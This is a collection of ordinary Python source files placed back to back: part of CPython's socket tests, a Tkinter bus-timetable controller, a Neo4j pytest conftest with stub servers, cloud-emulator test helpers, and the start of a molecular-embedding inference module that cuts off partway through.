self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
@unittest.skipUnless(hasattr(socket, "socketpair"),
"need socket.socketpair()")
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertTrue(s.type & socket.SOCK_NONBLOCK)
self.assertEqual(s.gettimeout(), timeout)
else:
self.assertFalse(s.type & socket.SOCK_NONBLOCK)
self.assertEqual(s.gettimeout(), None)
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking socket
# since the internal python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10MB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(self.TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=0.01) as sock, \
file as file:
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(thread, 'Threading required for this test.')
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest, UDPTimeoutTest ]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
bus_controller.py
|
from __init__ import *
class BusController(object):
def __init__(self):
self._logger = logging.getLogger('{}.{}'.format(cfg.LOGGER_BASE_NAME, self.__class__.__name__))
self._root = tk.Tk()
self._bus_view = BusView(master=self._root, controller=self)
self._bus_data = HomeBusAlerter()
self._is_running = False
self._current_lines_data: Dict[Tuple[int, int], LineData] = {}
self._current_lines_data_lock = threading.RLock()
self._logger.info('finished init')
def run(self):
self._is_running = True
self.ts_thread = threading.Thread(target=self.update_time_thread)
self.ts_thread.start()
self.tt_thread = threading.Thread(target=self.update_time_tables_thread)
self.tt_thread.start()
self.lu_thread = threading.Thread(target=self.update_last_updated_sec_thread)
self.lu_thread.start()
self._root.mainloop()
self._logger.info('main loop done')
def update_time_thread(self):
while self._is_running:
ts = datetime.now().strftime(cfg.TIME_FORMAT)
self._bus_view.update_time(ts=ts)
time.sleep(1)
def update_time_tables_thread(self):
while self._is_running:
for station_num, data in cfg.STATIONS_LINES_DICTIONARY.items():
line_filter = data['filter']
d = self._bus_data.get_data_from_bus_station_num(bus_station_num=station_num, line_filter=line_filter, bus_station_name=data['name'])
with self._current_lines_data_lock:
for l_d in d:
self._current_lines_data[(l_d.station_num, l_d.line_num)] = l_d
self._bus_view.update_time_tables(data=d)
time.sleep(cfg.TIME_WAIT_BETWEEN_REFRESH_SEC)
def update_last_updated_sec_thread(self):
while self._is_running:
with self._current_lines_data_lock:
for (station_num, bus_num), data in self._current_lines_data.items():
last_updated = int((datetime.now() - data.creation_time).total_seconds())
if last_updated < 60:
self._bus_view.update_last_updated_time(station_num=station_num, bus_num=bus_num, new_last_updated_time_sec=last_updated)
else:
self._bus_view.update_last_updated_time(station_num=station_num, bus_num=bus_num,
new_last_updated_time_sec='outdated')
time.sleep(1)
def kill(self):
self._is_running = False
self._bus_data.kill()
self.ts_thread.join(5)
self.tt_thread.join(5)
self._logger.info('all threads killed')
def init_logging(level):
root_logger = logging.getLogger()
root_logger.setLevel(level=logging.INFO)
file_name = os.path.join('logs', 'BusAlerter_{}'.format(datetime.now().strftime('%d_%m_%y__%H_%M_%S')))
file_handler = DiskSpaceRotatingFileHandler(folder_max_size=10E6, filename=file_name, maxBytes=1E6, backupCount=10000)
formatter = logging.Formatter(fmt=u'%(asctime)s:%(name)s:%(levelname)s:%(message)s')
file_handler.setFormatter(formatter)
console_handler = logging.StreamHandler()
console_handler.setFormatter(formatter)
logging._defaultFormatter = logging.Formatter(u"%(message)s") # so utf8 messages will not crash the logging
root_logger.addHandler(hdlr=file_handler)
root_logger.addHandler(hdlr=console_handler)
mylogger = logging.getLogger(cfg.LOGGER_BASE_NAME)
mylogger.setLevel(level=level)
if __name__ == '__main__':
init_logging(logging.DEBUG)
controller = BusController()
controller.run()
|
conftest.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright (c) "Neo4j"
# Neo4j Sweden AB [http://neo4j.com]
#
# This file is part of Neo4j.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import subprocess
import os
import time
from platform import system
from threading import Thread
from time import sleep
from boltkit.server.stub import BoltStubService
from pytest import fixture
import logging
log = logging.getLogger("neo4j")
# from neo4j.debug import watch
# watch("neo4j")
class StubServer:
def __init__(self, port, script):
self.port = port
self.script = os.path.join(os.path.dirname(__file__), "scripts", script)
def run(self):
shell = system() == "Windows" # I hate myself for doing this
self._process = subprocess.Popen(["python", "-m", "boltkit", "stub", "-v", "-l", ":{}".format(str(self.port)), "-t", "10", self.script], stdout=subprocess.PIPE, shell=shell)
# Need verbose for this to work
line = self._process.stdout.readline().decode("utf-8")
log.debug("started stub server {}".format(self.port))
log.debug(line.strip("\n"))
def wait(self):
while True:
return_code = self._process.poll()
if return_code is not None:
line = self._process.stdout.readline()
if not line:
break
try:
line = line.decode("utf-8")
line = line.strip("\n")
except UnicodeDecodeError:
pass
log.debug(line)
return True
def kill(self):
# Kill process if not already dead
if self._process.poll() is None:
self._process.kill()
class StubCluster:
def __init__(self, servers):
self.servers = {port: StubServer(port, script) for port, script in dict(servers).items()}
def __enter__(self):
self.start()
def __exit__(self, exc_type, exc_value, traceback):
self.wait()
def start(self):
for port, server in self.servers.items():
server.run()
def wait(self):
success = True
for port, server in self.servers.items():
if not server.wait():
success = False
server.kill()
if not success:
raise Exception("Stub server failed")
class LegacyStubServer(Thread):
def __init__(self, port, script):
super(LegacyStubServer, self).__init__()
self.port = port
self.script = os.path.join(os.path.dirname(__file__), "scripts", script)
def run(self):
check_call(["python", "-m", "boltkit.legacy.stub", "-v", str(self.port), self.script])
class LegacyStubCluster:
def __init__(self, servers):
self.servers = {port: LegacyStubServer(port, script) for port, script in dict(servers).items()}
def __enter__(self):
self.start()
def __exit__(self, exc_type, exc_value, traceback):
self.wait()
def start(self):
for port, server in self.servers.items():
server.start()
sleep(0.5)
def wait(self):
for port, server in self.servers.items():
server.join()
class DefaultBoltStubService(BoltStubService):
default_base_port = 9001
class StubCluster(StubCluster):
def __init__(self, *servers):
print("")
scripts = [os.path.join(os.path.dirname(__file__), "scripts", server) for server in servers]
bss = DefaultBoltStubService.load(*scripts)
servers2 = {port: script.filename for port, script in bss.scripts.items()}
super().__init__(servers2)
# def run():
# check_call(["bolt", "stub", "-v", "-t", "10", "-l", ":9001"] + scripts)
# self.thread = Thread(target=run)
# def __enter__(self):
# self.thread.start()
# sleep(0.5)
# def __exit__(self, exc_type, exc_value, traceback):
# self.thread.join(3)
@fixture
def script():
return lambda *paths: path_join(dirname(__file__), "scripts", *paths)
@fixture
def driver_info():
""" Base class for test cases that integrate with a server.
"""
return {
"uri_bolt": "bolt://localhost:9001",
"uri_neo4j": "neo4j://localhost:9001",
"user": "test",
"password": "test",
"auth_token": ("test", "test")
}
|
test_utils.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generic helper functions useful in tests."""
from builtins import object
from builtins import str
from future import standard_library
standard_library.install_aliases()
import atexit
import datetime
import io
import os
import requests
import shutil
import six
import socket
import subprocess
import sys
import tempfile
import threading
import unittest
from config import local_config
from datastore import data_types
from datastore import ndb_init
from google_cloud_utils import pubsub
from system import environment
from system import process_handler
CURRENT_TIME = datetime.datetime.utcnow()
EMULATOR_TIMEOUT = 20
# Per-process emulator instances.
_emulators = {}
def create_generic_testcase(created_days_ago=28):
"""Create a simple test case."""
testcase = data_types.Testcase()
# Add more values here as needed. Intended to be the bare minimum for what we
# need to simulate a test case.
testcase.absolute_path = '/a/b/c/test.html'
testcase.crash_address = '0xdeadbeef'
testcase.crash_revision = 1
testcase.crash_state = 'crashy_function()'
testcase.crash_stacktrace = testcase.crash_state
testcase.crash_type = 'fake type'
testcase.comments = 'Fuzzer: test'
testcase.fuzzed_keys = 'abcd'
testcase.minimized_keys = 'efgh'
testcase.fuzzer_name = 'fuzzer1'
testcase.open = True
testcase.one_time_crasher_flag = False
testcase.job_type = 'test_content_shell_drt'
testcase.status = 'Processed'
testcase.timestamp = CURRENT_TIME - datetime.timedelta(days=created_days_ago)
testcase.project_name = 'project'
testcase.platform = 'linux'
testcase.put()
return testcase
def entities_equal(entity_1, entity_2, check_key=True):
"""Return a bool on whether two input entities are the same."""
if check_key:
return entity_1.key == entity_2.key
return entity_1.to_dict() == entity_2.to_dict()
def entity_exists(entity):
"""Return a bool on where the entity exists in datastore."""
return entity.get_by_id(entity.key.id())
def adhoc(func):
"""Mark the testcase as an adhoc. Adhoc tests are NOT expected to run before
merging and are NOT counted toward test coverage; they are used to test
tricky situations.
Another way to think about it is that, if there was no adhoc test, we
would write a Python script (which is not checked in) to test what we want
anyway... so, it's better to check in the script.
For example, downloading a chrome revision (10GB) and
unpacking it. It can be enabled using the env ADHOC=1."""
return unittest.skipIf(not environment.get_value('ADHOC', False),
'Adhoc tests are not enabled.')(
func)
def integration(func):
"""Mark the testcase as integration because it depends on network resources
and/or is slow. The integration tests should, at least, be run before
merging and are counted toward test coverage. It can be enabled using the
env INTEGRATION=1."""
return unittest.skipIf(not environment.get_value('INTEGRATION', False),
'Integration tests are not enabled.')(
func)
def slow(func):
"""Slow tests which are skipped during presubmit."""
return unittest.skipIf(not environment.get_value('SLOW_TESTS', True),
'Skipping slow tests.')(
func)
def reproduce_tool(func):
"""Tests for the test case reproduction script."""
return unittest.skipIf(
not environment.get_value('REPRODUCE_TOOL_TESTS', False),
'Skipping reproduce tool tests.')(
func)
# TODO(mbarbella): Remove this and all users after fully migrating to Python 3.
def python2_only(func):
"""Tests which can only run on Python 2."""
return unittest.skipIf(sys.version_info.major != 2,
'Skipping Python 2-only test.')(
func)
def android_device_required(func):
"""Skip Android-specific tests if we cannot run them."""
reason = None
if not environment.get_value('ANDROID_SERIAL'):
reason = 'Android device tests require that ANDROID_SERIAL is set.'
elif not environment.get_value('INTEGRATION'):
reason = 'Integration tests are not enabled.'
elif environment.platform() != 'LINUX':
reason = 'Android device tests can only run on a Linux host.'
return unittest.skipIf(reason is not None, reason)(func)
class EmulatorInstance(object):
"""Emulator instance."""
def __init__(self, proc, port, read_thread, data_dir):
self._proc = proc
self._port = port
self._read_thread = read_thread
self._data_dir = data_dir
def cleanup(self):
"""Stop and clean up the emulator."""
process_handler.terminate_root_and_child_processes(self._proc.pid)
self._read_thread.join()
if self._data_dir:
shutil.rmtree(self._data_dir, ignore_errors=True)
def reset(self):
"""Reset emulator state."""
req = requests.post('http://localhost:{}/reset'.format(self._port))
req.raise_for_status()
def _find_free_port():
"""Find a free port."""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', 0))
_, port = sock.getsockname()
sock.close()
return port
def wait_for_emulator_ready(proc,
emulator,
indicator,
timeout=EMULATOR_TIMEOUT,
output_lines=None):
"""Wait for emulator to be ready."""
def _read_thread(proc, ready_event):
"""Thread to continuously read from the process stdout."""
ready = False
while True:
line = proc.stdout.readline()
if not line:
break
if output_lines is not None:
output_lines.append(line)
if not ready and indicator in line:
ready = True
ready_event.set()
# Wait for process to become ready.
ready_event = threading.Event()
thread = threading.Thread(target=_read_thread, args=(proc, ready_event))
thread.daemon = True
thread.start()
if not ready_event.wait(timeout):
raise RuntimeError(
'{} emulator did not get ready in time.'.format(emulator))
return thread
def start_cloud_emulator(emulator, args=None, data_dir=None):
"""Start a cloud emulator."""
ready_indicators = {
'datastore': b'is now running',
'pubsub': b'Server started',
}
default_flags = {
'datastore': ['--no-store-on-disk', '--consistency=1'],
'pubsub': [],
}
if emulator not in ready_indicators:
raise RuntimeError('Unsupported emulator')
if data_dir:
cleanup_dir = None
else:
temp_dir = tempfile.mkdtemp()
data_dir = temp_dir
cleanup_dir = temp_dir
port = _find_free_port()
command = [
'gcloud', 'beta', 'emulators', emulator, 'start',
'--data-dir=' + data_dir, '--host-port=localhost:' + str(port),
'--project=' + local_config.GAEConfig().get('application_id')
]
if args:
command.extend(args)
command.extend(default_flags[emulator])
# Start emulator.
proc = subprocess.Popen(
command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
thread = wait_for_emulator_ready(proc, emulator, ready_indicators[emulator])
# Set env vars.
env_vars = subprocess.check_output([
'gcloud', 'beta', 'emulators', emulator, 'env-init',
'--data-dir=' + data_dir
])
for line in env_vars.splitlines():
key, value = line.split()[1].split(b'=')
os.environ[key.strip().decode('utf-8')] = value.strip().decode('utf-8')
return EmulatorInstance(proc, port, thread, cleanup_dir)
def create_pubsub_topic(client, project, name):
"""Create topic if it doesn't exist."""
full_name = pubsub.topic_name(project, name)
if client.get_topic(full_name):
return
client.create_topic(full_name)
def create_pubsub_subscription(client, project, topic, name):
"""Create subscription if it doesn't exist."""
topic_name = pubsub.topic_name(project, topic)
full_name = pubsub.subscription_name(project, name)
if client.get_subscription(full_name):
return
client.create_subscription(full_name, topic_name)
def setup_pubsub(project):
"""Set up pubsub topics and subscriptions."""
config = local_config.Config('pubsub.queues')
client = pubsub.PubSubClient()
queues = config.get('resources')
for queue in queues:
create_pubsub_topic(client, project, queue['name'])
create_pubsub_subscription(client, project, queue['name'], queue['name'])
def with_cloud_emulators(*emulator_names):
"""Decorator for starting cloud emulators from a unittest.TestCase."""
def decorator(cls):
"""Decorator."""
class Wrapped(cls):
"""Wrapped class."""
@classmethod
def setUpClass(cls):
"""Class setup."""
for emulator_name in emulator_names:
if emulator_name not in _emulators:
_emulators[emulator_name] = start_cloud_emulator(emulator_name)
atexit.register(_emulators[emulator_name].cleanup)
if emulator_name == 'datastore':
cls._context_generator = ndb_init.context()
cls._context_generator.__enter__()
super(Wrapped, cls).setUpClass()
@classmethod
def tearDownClass(cls):
"""Class teardown."""
for emulator_name in emulator_names:
if emulator_name == 'datastore':
cls._context_generator.__exit__(None, None, None)
super(Wrapped, cls).tearDownClass()
def setUp(self):
for emulator in six.itervalues(_emulators):
emulator.reset()
super(Wrapped, self).setUp()
Wrapped.__module__ = cls.__module__
Wrapped.__name__ = cls.__name__
return Wrapped
return decorator
def set_up_pyfakefs(test_self):
"""Helper to set up Pyfakefs."""
real_cwd = os.path.realpath(os.getcwd())
config_dir = os.path.realpath(environment.get_config_directory())
test_self.setUpPyfakefs()
test_self.fs.add_real_directory(config_dir, lazy_read=False)
os.chdir(real_cwd)
def supported_platforms(*platforms):
"""Decorator for enabling tests only on certain platforms."""
def decorator(func): # pylint: disable=unused-argument
"""Decorator."""
return unittest.skipIf(environment.platform() not in platforms,
'Unsupported platform.')(
func)
return decorator
class MockStdout(io.BufferedWriter):
"""Mock stdout."""
def __init__(self):
super(MockStdout, self).__init__(io.BytesIO())
def getvalue(self):
self.flush()
return self.raw.getvalue()
|
inference.py
|
"""Helper functions to run inference on trained models"""
import argparse
import os
import sys
import numpy as np
import tensorflow as tf
import multiprocessing as mp
import json
import zipfile
from cddd.input_pipeline import InputPipelineInferEncode, InputPipelineInferDecode
from cddd.hyperparameters import add_arguments, create_hparams
from cddd.model_helper import build_models
from cddd.hyperparameters import DEFAULT_DATA_DIR
try:
import zmq
except ImportError:
print("Consider installing the package zmq to utilize the InferenceServer class")
_default_model_dir = os.path.join(DEFAULT_DATA_DIR, 'default_model')
def download_model(model_dir):
if not os.path.isdir(model_dir):
sys.path.append(DEFAULT_DATA_DIR)
from download_pretrained import download_file_from_google_drive, FILE_ID
parent_dir = os.path.abspath(os.path.join(model_dir, os.pardir))
destination = os.path.join(parent_dir, "default_model.zip")
download_file_from_google_drive(FILE_ID, destination)
with zipfile.ZipFile(destination, 'r') as zip_ref:
zip_ref.extractall(parent_dir)
def sequence2embedding(model, hparams, seq_list):
"""Helper Function to run a forwards path up to the bottneck layer (ENCODER).
Encodes a list of sequences into the molecular descriptor.
Args:
model: The translation model instance to use.
hparams: Hyperparameter object.
seq_list: list of sequnces that should be encoded.
Returns:
Embedding of the input sequnces as numpy array.
"""
emb_list = []
with model.graph.as_default():
input_pipeline = InputPipelineInferEncode(seq_list, hparams)
input_pipeline.initilize()
model.model.restore(model.sess)
while 1:
try:
input_seq, input_len = input_pipeline.get_next()
emb = model.model.seq2emb(model.sess, input_seq, input_len)
emb_list.append(emb)
except StopIteration:
break
embedding_array = np.concatenate(emb_list)
return embedding_array
def embedding2sequence(model, hparams, embedding, num_top=1, maximum_iterations=1000):
"""Helper Function to run a forwards path from thebottneck layer to
output (DECODER).
Args:
model: The translation model instance to use.
hparams: Hyperparameter object.
embedding: Array with samples x num_features
Returns:
List of sequences decoded from the input embedding (descriptor).
"""
seq_list = []
with model.graph.as_default():
input_pipeline = InputPipelineInferDecode(embedding, hparams)
input_pipeline.initilize()
model.model.restore(model.sess)
while 1:
try:
emb = input_pipeline.get_next()
seq = model.model.emb2seq(model.sess, emb, num_top, maximum_iterations)
if num_top == 1:
